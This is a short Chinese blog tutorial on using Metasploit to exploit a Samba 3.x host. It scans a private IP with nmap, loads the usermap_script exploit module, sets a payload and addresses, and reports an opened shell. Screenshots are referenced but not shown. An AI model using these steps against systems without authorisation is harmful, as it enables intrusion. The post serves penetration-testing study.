Metasploit系列(二) -- 漏洞利用

简介: Metasploit系列(二) -- 漏洞利用

一、使用nmap扫描目标机开放的端口


nmap -sV 192.168.10.254

0a2653c851af460fa595bd959398a8f1.png


二、主机运行着Samba 3.x服务,search samba


0eacb84100b54626af849e6b562bf92a.png


三、use exploit/multi/samba/usermap_script


四、选择攻击载荷模块


2d65d23f6d4748949b924e4057485923.png


五、设置被攻击主机ip及端口,发动攻击ip及端口


2e9b90b2ca334476abebe75bafe6eeaa.png


六、run


4cebaac233b3433da32a72337a77fc60.png


已建立shell链接

禁止非法,后果自负

目录
相关文章
|
1月前
|
安全 Linux Shell
Kali渗透测试:使用Metasploit对Web应用的攻击
Kali渗透测试:使用Metasploit对Web应用的攻击
|
1月前
|
安全 网络协议 Linux
Kali渗透测试:使用Armitage针对漏洞进行攻击
Kali渗透测试:使用Armitage针对漏洞进行攻击
|
6月前
|
安全 Unix 网络安全
Metasploit
Metasploit
111 10
|
6月前
|
安全 Shell Windows
Metasploit -- CVE-2019-0708漏洞检测及利用
Metasploit -- CVE-2019-0708漏洞检测及利用
111 0
|
安全 测试技术 网络安全
如何使用Metasploit进行漏洞利用?
如何使用Metasploit进行漏洞利用?
204 0
|
安全 Shell
Metasploit系列(二) -- 漏洞利用
Metasploit系列(二) -- 漏洞利用
121 0
Metasploit系列(二) -- 漏洞利用
|
安全 Ubuntu 关系型数据库
Metasploit -- 攻击Metasploitable2靶机
Metasploit -- 攻击Metasploitable2靶机
528 0
Metasploit -- 攻击Metasploitable2靶机
|
监控 安全 Windows
Metasploit -- 木马生成原理和方法
Metasploit -- 木马生成原理和方法
701 0
Metasploit -- 木马生成原理和方法
|
安全 网络安全 Windows
渗透测试-使用metasploit的evasion模块生成后门木马
渗透测试-使用metasploit的evasion模块生成后门木马
渗透测试-使用metasploit的evasion模块生成后门木马
|
安全 关系型数据库 MySQL
Metasploit渗透测试(框架介绍、靶机安装、基本使用方法)
Metasploit渗透测试(框架介绍、靶机安装、基本使用方法)
Metasploit渗透测试(框架介绍、靶机安装、基本使用方法)